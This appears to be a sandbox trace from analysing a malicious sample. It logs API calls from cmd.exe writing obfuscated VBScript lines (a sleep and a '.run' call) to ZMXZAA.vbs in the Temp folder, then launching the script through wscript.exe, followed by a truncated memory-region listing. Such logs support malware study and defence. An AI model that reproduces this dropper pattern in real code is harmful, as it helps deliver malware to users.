[0084.080] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x39e5f8, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39e5f8*=0xa, lpOverlapped=0x0) returned 1
[0084.080] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0084.080] _close (_FileHandle=3) returned 0
[0084.081] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.081] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.081] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.081] GetFileType (hFile=0x7) returned 0x2
[0084.081] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0084.081] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39e780 | out: lpMode=0x39e780) returned 1
[0084.081] _dup (_FileHandle=1) returned 3
[0084.081] _close (_FileHandle=1) returned 0
[0084.081] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0084.081] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39e750, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0084.082] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0084.082] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.082] GetFileType (hFile=0x1c) returned 0x1
[0084.082] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x52c
[0084.082] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39e768*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39e768*=0) returned 0x52b
[0084.082] ReadFile (in: hFile=0x1c, lpBuffer=0x39e760, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39e75c, lpOverlapped=0x0 | out: lpBuffer=0x39e760*, lpNumberOfBytesRead=0x39e75c*=0x1, lpOverlapped=0x0) returned 1
[0084.082] GetConsoleTitleW (in: lpConsoleTitle=0x39e580, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0084.082] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39e548 | out: _Buffer="Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing \r\n") returned 45
[0084.082] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.082] GetFileType (hFile=0x1c) returned 0x1
[0084.082] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.082] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing \r\n", lpUsedDefaultChar=0x0) returned 46
[0084.082] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x39e534, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39e534*=0x2d, lpOverlapped=0x0) returned 1
[0084.082] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0084.083] _close (_FileHandle=3) returned 0
[0084.083] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.083] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.083] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.083] GetFileType (hFile=0x7) returned 0x2
[0084.083] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0084.083] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39e6bc | out: lpMode=0x39e6bc) returned 1
[0084.083] _dup (_FileHandle=1) returned 3
[0084.084] _close (_FileHandle=1) returned 0
[0084.084] _wcsicmp (_String1="ZMXZAA.VBs", _String2="con") returned 23
[0084.084] CreateFileW (lpFileName="ZMXZAA.VBs" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39e68c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0084.084] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0084.084] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.084] GetFileType (hFile=0x1c) returned 0x1
[0084.084] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x559
[0084.084] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39e6a4*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39e6a4*=0) returned 0x558
[0084.084] ReadFile (in: hFile=0x1c, lpBuffer=0x39e69c, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39e698, lpOverlapped=0x0 | out: lpBuffer=0x39e69c*, lpNumberOfBytesRead=0x39e698*=0x1, lpOverlapped=0x0) returned 1
[0084.084] GetConsoleTitleW (in: lpConsoleTitle=0x39e4bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0084.084] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39e484 | out: _Buffer="WScript.Sleep(5000) \r\n") returned 22
[0084.084] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.085] GetFileType (hFile=0x1c) returned 0x1
[0084.085] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.085] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="WScript.Sleep(5000) \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WScript.Sleep(5000) \r\n", lpUsedDefaultChar=0x0) returned 23
[0084.085] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x39e470, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39e470*=0x16, lpOverlapped=0x0) returned 1
[0084.085] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0084.085] _close (_FileHandle=3) returned 0
[0084.085] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.085] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.085] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.085] GetFileType (hFile=0x7) returned 0x2
[0084.086] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0084.086] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39e5f8 | out: lpMode=0x39e5f8) returned 1
[0084.086] _dup (_FileHandle=1) returned 3
[0084.086] _close (_FileHandle=1) returned 0
[0084.086] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0084.086] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39e5c8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0084.086] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0084.086] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.086] GetFileType (hFile=0x1c) returned 0x1
[0084.086] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x56f
[0084.086] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39e5e0*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39e5e0*=0) returned 0x56e
[0084.087] ReadFile (in: hFile=0x1c, lpBuffer=0x39e5d8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39e5d4, lpOverlapped=0x0 | out: lpBuffer=0x39e5d8*, lpNumberOfBytesRead=0x39e5d4*=0x1, lpOverlapped=0x0) returned 1
[0084.087] GetConsoleTitleW (in: lpConsoleTitle=0x39e3f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0084.087] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39e3c0 | out: _Buffer="H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) \r\n") returned 79
[0084.087] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.087] GetFileType (hFile=0x1c) returned 0x1
[0084.087] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.087] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) \r\n", lpUsedDefaultChar=0x0) returned 80
[0084.087] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x39e3ac, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39e3ac*=0x4f, lpOverlapped=0x0) returned 1
[0084.087] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0084.087] _close (_FileHandle=3) returned 0
[0084.088] GetConsoleTitleW (in: lpConsoleTitle=0x39e3f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0084.088] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0084.088] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0084.088] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0084.089] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3bf888, lpFilePart=0x381b90 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp", lpFilePart=0x381b90*="Temp") returned 0x24
[0084.089] SetErrorMode (uMode=0x0) returned 0x1
[0084.089] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab60640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0xbf
[0084.089] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0084.089] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab60640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
[0084.089] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0084.089] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vbs", fInfoLevelId=0x1, lpFindFileData=0x38192c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38192c) returned 0x3bfd30
[0084.089] FindClose (in: hFindFile=0x3bfd30 | out: hFindFile=0x3bfd30) returned 1
[0084.090] _wcsicmp (_String1=".vBS", _String2=".CMD") returned 19
[0084.090] _wcsicmp (_String1=".vBS", _String2=".BAT") returned 20
[0084.090] GetStartupInfoW (in: lpStartupInfo=0x381e44 | out: lpStartupInfo=0x381e44*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0084.090] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x381f38 | out: lpAttributeList=0x0, lpSize=0x381f38) returned 0
[0084.090] GetLastError () returned 0x7a
[0084.090] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bfd30, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x381f38 | out: lpAttributeList=0x3bfd30, lpSize=0x381f38) returned 1
[0084.090] UpdateProcThreadAttribute (in: lpAttributeList=0x3bfd30, dwFlags=0x0, Attribute=0x60001, lpValue=0x381f10, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bfd30, lpPreviousValue=0x0) returned 1
[0084.090] CreateProcessW (in: lpApplicationName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS", lpCommandLine="ZMXZAA.vbs ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x381ec8*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x7, hStdError=0xb), lpProcessInformation=0x381f20 | out: lpCommandLine="ZMXZAA.vbs ", lpProcessInformation=0x381f20*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0
[0084.091] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bfd30 | out: lpAttributeList=0x3bfd30)
[0084.091] GetLastError () returned 0xc1
[0084.091] GetConsoleWindow () returned 0x3021a
[0084.092] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x76b00000
[0084.095] GetProcAddress (hModule=0x76b00000, lpProcName="ShellExecuteExW") returned 0x76b21e46
[0084.095] ShellExecuteExW (in: pExecInfo=0x381e88*(cbSize=0x3c, fMask=0x140, hwnd=0x3021a, lpVerb=0x0, lpFile="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS", lpParameters=" ", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x381e88*(cbSize=0x3c, fMask=0x140, hwnd=0x3021a, lpVerb=0x0, lpFile="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS", lpParameters=" ", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x26c)) returned 1
[0086.358] CloseHandle (hObject=0x26c) returned 1
[0086.358] _get_osfhandle (_FileHandle=1) returned 0x7
[0086.358] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0086.358] _get_osfhandle (_FileHandle=1) returned 0x7
[0086.358] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab541ac | out: lpMode=0x4ab541ac) returned 1
[0086.358] _get_osfhandle (_FileHandle=0) returned 0x3
[0086.358] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab541b0 | out: lpMode=0x4ab541b0) returned 1
[0086.359] SetConsoleInputExeNameW () returned 0x1
[0086.359] GetConsoleOutputCP () returned 0x1b5
[0086.359] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab54260 | out: lpCPInfo=0x4ab54260) returned 1
[0086.359] SetThreadUILanguage (LangId=0x0) returned 0x409
[0086.359] exit (_Code=0)
Thread:
id = 194
os_tid = 0x8e8
Thread:
id = 195
os_tid = 0x528
Thread:
id = 196
os_tid = 0x550
Thread:
id = 197
os_tid = 0x15c
Process:
id = "12"
image_name = "wscript.exe"
filename = "c:\\windows\\syswow64\\wscript.exe"
page_root = "0x2a16f000"
os_pid = "0x9c0"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "11"
os_parent_pid = "0x330"
cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS\" "
cur_dir = "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2279
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2280
start_va = 0x30000
end_va = 0x31fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 2281
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x40000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2282
start_va = 0x50000
end_va = 0x53fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 2283
start_va = 0xb0000
end_va = 0x1affff
entry_point = 0x0
region_type = private
name = "private_0x00000000000b0000"
filename = ""
Region:
id = 2284
start_va = 0x230000
end_va = 0x26ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000230000"
filename = ""
Region:
id = 2285
start_va = 0x630000
end_va = 0x655fff
entry_point = 0x630000
region_type = mapped_file
name = "wscript.exe"
filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe")
Region:
id = 2286
start_va = 0x77c40000
end_va = 0x77de8fff
entry_point = 0x77c40000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2287
start_va = 0x77e20000
end_va = 0x77f9ffff
entry_point = 0x77e20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 2288
start_va = 0x7efb0000
end_va = 0x7efd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 2289
start_va = 0x7efdb000
end_va = 0x7efddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 2290
start_va = 0x7efde000
end_va = 0x7efdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 2291
start_va = 0x7efdf000
end_va = 0x7efdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 2292
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2293
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2294
start_va = 0x7fff0000
end_va = 0x7fffffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 2295
start_va = 0x2f0000
end_va = 0x36ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 2296
start_va = 0x752a0000
end_va = 0x752a7fff
entry_point = 0x752a0000
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 2297
start_va = 0x752b0000
end_va = 0x7530bfff
entry_point = 0x752b0000
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 2298
start_va = 0x75310000
end_va = 0x7534efff
entry_point = 0x75310000
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 2300
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2301
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2302
start_va = 0x1b0000
end_va = 0x216fff
entry_point = 0x1b0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2303
start_va = 0x3f0000
end_va = 0x4effff
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2304
start_va = 0x74f90000
end_va = 0x74f98fff
entry_point = 0x74f90000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 2305
start_va = 0x75970000
end_va = 0x7597bfff
entry_point = 0x75970000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 2306
start_va = 0x75980000
end_va = 0x759dffff
entry_point = 0x75980000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 2307
start_va = 0x759e0000
end_va = 0x759f8fff
entry_point = 0x759e0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 2308
start_va = 0x75a10000
end_va = 0x75abbfff
entry_point = 0x75a10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 2309
start_va = 0x75cf0000
end_va = 0x75e4bfff
entry_point = 0x75cf0000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 2310
start_va = 0x75f40000
end_va = 0x75f85fff
entry_point = 0x75f40000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 2311
start_va = 0x75fa0000
end_va = 0x7603cfff
entry_point = 0x75fa0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 2312
start_va = 0x760d0000
end_va = 0x761bffff
entry_point = 0x760d0000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 2313
start_va = 0x76220000
end_va = 0x7632ffff
entry_point = 0x76220000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 2314
start_va = 0x76490000
end_va = 0x7652ffff
entry_point = 0x76490000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 2315
start_va = 0x76720000
end_va = 0x767aefff
entry_point = 0x76720000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 2316
start_va = 0x76a70000
end_va = 0x76afffff
entry_point = 0x76a70000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 2317
start_va = 0x77810000
end_va = 0x77819fff
entry_point = 0x77810000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 2318
start_va = 0x77820000
end_va = 0x7791ffff
entry_point = 0x77820000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 2319
start_va = 0x77a20000
end_va = 0x77b19fff
entry_point = 0x0
region_type = private
name = "private_0x0000000077a20000"
filename = ""
Region:
id = 2320
start_va = 0x77b20000
end_va = 0x77c3efff
entry_point = 0x0
region_type = private
name = "private_0x0000000077b20000"
filename = ""
Region:
id = 2321
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2322
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2323
start_va = 0x660000
end_va = 0x7e7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000660000"
filename = ""
Region:
id = 2324
start_va = 0x75c00000
end_va = 0x75c5ffff
entry_point = 0x75c00000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2325
start_va = 0x75e50000
end_va = 0x75f1bfff
entry_point = 0x75e50000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 2335
start_va = 0x30000
end_va = 0x36fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2336
start_va = 0x60000
end_va = 0x61fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 2337
start_va = 0x70000
end_va = 0x70fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 2338
start_va = 0x80000
end_va = 0x80fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000080000"
filename = ""
Region:
id = 2339
start_va = 0x7f0000
end_va = 0x970fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007f0000"
filename = ""
Region:
id = 2340
start_va = 0x980000
end_va = 0x1d7ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000980000"
filename = ""
Region:
id = 2341
start_va = 0x1d80000
end_va = 0x20c2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001d80000"
filename = ""
Region:
id = 2342
start_va = 0x75210000
end_va = 0x7528ffff
entry_point = 0x75210000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 2343
start_va = 0x4f0000
end_va = 0x57ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004f0000"
filename = ""
Region:
id = 2344
start_va = 0x20d0000
end_va = 0x21aefff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000020d0000"
filename = ""
Region:
id = 2345
start_va = 0x21d0000
end_va = 0x220ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000021d0000"
filename = ""
Region:
id = 2346
start_va = 0x23d0000
end_va = 0x24cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000023d0000"
filename = ""
Region:
id = 2347
start_va = 0x7efd8000
end_va = 0x7efdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 2348
start_va = 0x24d0000
end_va = 0x279efff
entry_point = 0x24d0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2349
start_va = 0x90000
end_va = 0x9efff
entry_point = 0x90000
region_type = mapped_file
name = "wscript.exe"
filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe")
Region:
id = 2350
start_va = 0x75040000
end_va = 0x7509efff
